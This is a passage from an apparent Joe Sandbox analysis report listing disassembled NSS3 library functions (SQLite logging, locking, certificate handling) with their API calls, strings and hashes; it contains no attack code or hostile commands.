sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6D5D30C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6D5D30BB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 98f6eaab1a210d97817bd08d77e2e9dcdf1f4af6f5d488c9c4e6d458be453c9b
Instruction ID: 6cbc0ce254790cbd14da80f393dc9f4b8fc3f5059b03224273656518ab094d8e
Opcode Fuzzy Hash: 98f6eaab1a210d97817bd08d77e2e9dcdf1f4af6f5d488c9c4e6d458be453c9b
Instruction Fuzzy Hash: 3941C171604607EFEB14CF29D880A5AB7A5FF48365F058A28EC198BB40E771F955CBE0

Function 6D518CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6D52124D,00000001), ref: 6D518D19
EnterCriticalSection.KERNEL32(?,?,?,?,6D52124D,00000001), ref: 6D518D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6D52124D,00000001), ref: 6D518D73
PR_Unlock.NSS3(?,?,?,?,?,6D52124D,00000001), ref: 6D518D8C

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

PR_Unlock.NSS3(?,?,?,?,?,6D52124D,00000001), ref: 6D518DBA

Strings

KRAM, xrefs: 6D518D3E
KRAM, xrefs: 6D518CF9

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 10efd528a3ac4f64ba2fbd876ed550fb587b9e9c8f8bbc40c84138e5839e3b1e
Instruction ID: d4d1938331150c6792c676f1c4bdd842f47692f940dfb1d45852d101434bbe57
Opcode Fuzzy Hash: 10efd528a3ac4f64ba2fbd876ed550fb587b9e9c8f8bbc40c84138e5839e3b1e
Instruction Fuzzy Hash: 3C2180B59087029FDB14EF79C88566ABBF0FF85304F068E69D99987701EB34D841CB92

Function 6D610ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6D610EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6D610EFA

Part of subcall function 6D4FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6D4FAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6D610ED9, 6D610EE5, 6D610F06, 6D610F0B
Aborting, xrefs: 6D610EB3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 6e6a7135eab1de71bea5be2266d2d2329e3c7c6e4f29a53b7f8d1982687759bf
Instruction ID: d4127126c2a318278b6d299a1782ca72a88e41ca41a1bf6f30d286fb8e75ed3a
Opcode Fuzzy Hash: 6e6a7135eab1de71bea5be2266d2d2329e3c7c6e4f29a53b7f8d1982687759bf
Instruction Fuzzy Hash: 750192B5800204BBDF019F6ADC55DAB3F3DEF4A364B014465FD0A87211D731E960D7A2

Function 6D5F1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Om,?,?,6D4F4E1D), ref: 6D5F1C8A
sqlite3_free.NSS3(00000000), ref: 6D5F1CB6

Strings

a generated column, xrefs: 6D5F1C6C
an index, xrefs: 6D5F1C67
a CHECK constraint, xrefs: 6D5F1C76, 6D5F1C81
w=Om, xrefs: 6D5F1C44
non-deterministic use of %s() in %s, xrefs: 6D5F1C85

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Om
API String ID: 1840970956-3947843649
Opcode ID: 3368d7b7e544a30039fd274814765d1810e36e0f2a4a4386093c1179a6f24556
Instruction ID: d85a5e3092ca829cbcf47d0943ddbb1b3e50214c1a0a311248cd8b51d7553eb2
Opcode Fuzzy Hash: 3368d7b7e544a30039fd274814765d1810e36e0f2a4a4386093c1179a6f24556
Instruction Fuzzy Hash: AA01F7B1A042415BD704EF6CD802D7177E6EFC638CB16486DED498B252EB32EC538791

Function 6D5D4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D5D4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D5D4DE0

Strings

misuse, xrefs: 6D5D4DD5
API call with %s database connection pointer, xrefs: 6D5D4DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D5D4DCB
invalid, xrefs: 6D5D4DB8
%s at line %d of [%.10s], xrefs: 6D5D4DDA

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 9b5a00e859f09ee97b209fb2c57a658eba4830081589c42f663cf572ec07387b
Instruction ID: 40f0f83246485c7d14932fda0470ad685daf11fd43775f30fa766b85fdcbb0a0
Opcode Fuzzy Hash: 9b5a00e859f09ee97b209fb2c57a658eba4830081589c42f663cf572ec07387b
Instruction Fuzzy Hash: B5F05911E185356BDB80E21CCC12FB733955F2E314F0B19A0EE047B593D2169C5083F4

Function 6D5D4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6D5D4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D5D4E4D

Strings

misuse, xrefs: 6D5D4E42
API call with %s database connection pointer, xrefs: 6D5D4E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D5D4E38
invalid, xrefs: 6D5D4E25
%s at line %d of [%.10s], xrefs: 6D5D4E47

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 5179cac7480d009ac4fe45aff10fbf286d1f86a9074ac1823e571f16bfe466cf
Instruction ID: 0301a985fe6925a0cc32da1bbc127c917f8a11f8f5f9c663e162c06a25f969d5
Opcode Fuzzy Hash: 5179cac7480d009ac4fe45aff10fbf286d1f86a9074ac1823e571f16bfe466cf
Instruction Fuzzy Hash: 44F0E211E499393FEB544228DC11FB73785DB1E321F0618A1EA086B693D316986042F6

Function 6D540C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6D541444,?,00000001,?,00000000,00000000,?,?,6D541444,?,?,00000000,?,?), ref: 6D540CB3

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?,?,6D541444,?), ref: 6D540DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?,?,6D541444,?), ref: 6D540DEC

Part of subcall function 6D560F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6D502AF5,?,?,?,?,?,6D500A1B,00000000), ref: 6D560F1A
Part of subcall function 6D560F10: malloc.MOZGLUE(00000001), ref: 6D560F30
Part of subcall function 6D560F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6D560F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?), ref: 6D540DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6D541444,?,00000001,?,00000000), ref: 6D540E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?), ref: 6D540E53
PR_GetCurrentThread.NSS3(?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?,?,6D541444,?,?,00000000), ref: 6D540E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6D541444,?,00000001,?,00000000,00000000,?), ref: 6D540E79

Part of subcall function 6D551560: TlsGetValue.KERNEL32(00000000,?,6D520844,?), ref: 6D55157A
Part of subcall function 6D551560: EnterCriticalSection.KERNEL32(?,?,?,6D520844,?), ref: 6D55158F
Part of subcall function 6D551560: PR_Unlock.NSS3(?,?,?,?,6D520844,?), ref: 6D5515B2

Part of subcall function 6D51B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6D521397,00000000,?,6D51CF93,5B5F5EC0,00000000,?,6D521397,?), ref: 6D51B1CB
Part of subcall function 6D51B1A0: free.MOZGLUE(5B5F5EC0,?,6D51CF93,5B5F5EC0,00000000,?,6D521397,?), ref: 6D51B1D2

Part of subcall function 6D5189E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6D5188AE,-00000008), ref: 6D518A04
Part of subcall function 6D5189E0: EnterCriticalSection.KERNEL32(?), ref: 6D518A15
Part of subcall function 6D5189E0: memset.VCRUNTIME140(6D5188AE,00000000,00000132), ref: 6D518A27
Part of subcall function 6D5189E0: PR_Unlock.NSS3(?), ref: 6D518A35

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 2b878e6ee43fdb357cad2b5085d143157095051503c7e5ee494a5ef02b4612e6
Instruction ID: 35526af9c3e268706512c1fc76ebd9e1f029c9228c56b7cd28fddc3504989b2f
Opcode Fuzzy Hash: 2b878e6ee43fdb357cad2b5085d143157095051503c7e5ee494a5ef02b4612e6
Instruction Fuzzy Hash: 7F5137B6D042015FEB049F69DC81E7B37A8AF95358F164825FD099B702FB31ED2486A3

Function 6D4F6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6D4F6ED8
sqlite3_value_text.NSS3(?,?), ref: 6D4F6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6D4F6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6D4F6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6D4F6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6D4F7010
sqlite3_value_blob.NSS3(?,?), ref: 6D4F701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6D4F7052

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 0d23b0a46ec28631605b68e15594b68f0a8cac42868e7c0333acab06af01206e
Instruction ID: 082e3666c79de73e70f207e4909f070e8170afafa8b737a2d103b3f94dccdbc1
Opcode Fuzzy Hash: 0d23b0a46ec28631605b68e15594b68f0a8cac42868e7c0333acab06af01206e
Instruction Fuzzy Hash: D66194B1E082168FDB01CBA8C840BAEB7B2BFC5304F254169D515AB361E7369D17CBE1

Function 6D568F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6D567313), ref: 6D568FBB

Part of subcall function 6D5607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D508298,?,?,?,6D4FFCE5,?), ref: 6D5607BF
Part of subcall function 6D5607B0: PL_HashTableLookup.NSS3(?,?), ref: 6D5607E6
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D56081B
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D560825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6D567313), ref: 6D569012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6D567313), ref: 6D56903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6D567313), ref: 6D56909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6D567313), ref: 6D5690DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6D567313), ref: 6D5690F1

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6D567313), ref: 6D56906B

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6D567313), ref: 6D569128

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: f930a445c459456e8cc25e0726166eb0138389e28777ecd455d58a0090c49f8c
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: F6517D75A042428BEB18DF69DC44B36B3F9AF84325F164829D915DBB71EB31E840CEB1

Function 6D519C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6D518850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6D520715), ref: 6D518859
Part of subcall function 6D518850: PR_NewLock.NSS3 ref: 6D518874
Part of subcall function 6D518850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6D51888D

PR_NewLock.NSS3 ref: 6D519CAD

Part of subcall function 6D5C98D0: calloc.MOZGLUE(00000001,00000084,6D4F0936,00000001,?,6D4F102C), ref: 6D5C98E5

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

TlsGetValue.KERNEL32 ref: 6D519CE8
EnterCriticalSection.KERNEL32(?,?,6D51ECEC,6D522FCD,00000000,?,6D522FCD,?), ref: 6D519D01
TlsGetValue.KERNEL32(?,?,?,6D51ECEC,6D522FCD,00000000,?,6D522FCD,?), ref: 6D519D38
EnterCriticalSection.KERNEL32(?,?,6D51ECEC,6D522FCD,00000000,?,6D522FCD,?), ref: 6D519D4D
PR_Unlock.NSS3 ref: 6D519D70
PR_Unlock.NSS3 ref: 6D519DC3
PR_NewLock.NSS3 ref: 6D519DDD

Part of subcall function 6D5188D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6D520725,00000000,00000058), ref: 6D518906
Part of subcall function 6D5188D0: EnterCriticalSection.KERNEL32(?), ref: 6D51891A
Part of subcall function 6D5188D0: PL_ArenaAllocate.NSS3(?,?), ref: 6D51894A
Part of subcall function 6D5188D0: calloc.MOZGLUE(00000001,6D52072D,00000000,00000000,00000000,?,6D520725,00000000,00000058), ref: 6D518959
Part of subcall function 6D5188D0: memset.VCRUNTIME140(?,00000000,?), ref: 6D518993
Part of subcall function 6D5188D0: PR_Unlock.NSS3(?), ref: 6D5189AF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 54eaf3fa1e026a47ae096dfc93c92344100c5c73fefff35415650a46dddf7bdd
Instruction ID: 6ed4b667e35229d47aeedb07c701d0ddee6f3b9df54f11057ed95ef2018ec6f3
Opcode Fuzzy Hash: 54eaf3fa1e026a47ae096dfc93c92344100c5c73fefff35415650a46dddf7bdd
Instruction Fuzzy Hash: 1A513675A087069FEB04DF69C88466EBBF0BF44354F068969D9A99B710D734E880CFD2

Function 6D50DCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6D50DCFA

Part of subcall function 6D5C9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DC6
Part of subcall function 6D5C9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D610A27), ref: 6D5C9DD1
Part of subcall function 6D5C9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D5C9DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D50DD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6D50DD62
CERT_DestroyCertificate.NSS3(?), ref: 6D50DD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6D50DD81
CERT_RemoveCertListNode.NSS3(?), ref: 6D50DD8F

Part of subcall function 6D5206A0: TlsGetValue.KERNEL32 ref: 6D5206C2
Part of subcall function 6D5206A0: EnterCriticalSection.KERNEL32(?), ref: 6D5206D6
Part of subcall function 6D5206A0: PR_Unlock.NSS3 ref: 6D5206EB

CERT_DestroyCertificate.NSS3(?), ref: 6D50DD9E
CERT_DestroyCertificate.NSS3(?), ref: 6D50DDB7

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

